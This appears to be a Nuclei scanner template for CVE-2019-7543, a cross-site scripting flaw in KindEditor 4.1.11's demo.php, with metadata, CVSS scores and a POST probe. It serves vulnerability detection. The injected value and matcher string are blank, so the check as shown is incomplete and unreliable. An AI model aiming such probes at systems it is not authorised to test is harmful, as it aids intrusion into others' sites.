id: CVE-2019-7543 info: name: KindEditor 4.1.11 - Cross-Site Scripting author: pikpikcu severity: medium description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of KindEditor or apply the necessary security patches provided by the vendor. reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/HaleBera/A-NOVEL-CONTAINER-ATTACKS-DATASET-FOR-INTRUSION-DETECTION - https://github.com/HaleBera/A-NOVEL-CONTAINER-ATTACKS-DATASET-FOR-INTRUSION-DETECTION-Deployments classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.47935 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kindsoft product: kindeditor tags: cve,cve2019,kindeditor,xss,kindsoft http: - method: POST path: - '{{BaseURL}}/kindeditor/php/demo.php' - '{{BaseURL}}/php/demo.php' body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html # digest: 4a0a00473045022100b776242318c4cd77e38501c721ca64e2b6c0f97c56aab5abc16f17b4fdfc5eba022021b059dda84ab1d04b5f5f58e693fae7675b533a7e4d0d62f6aaada2162c7bc8:922c64590222798bb761d5b6d8e72950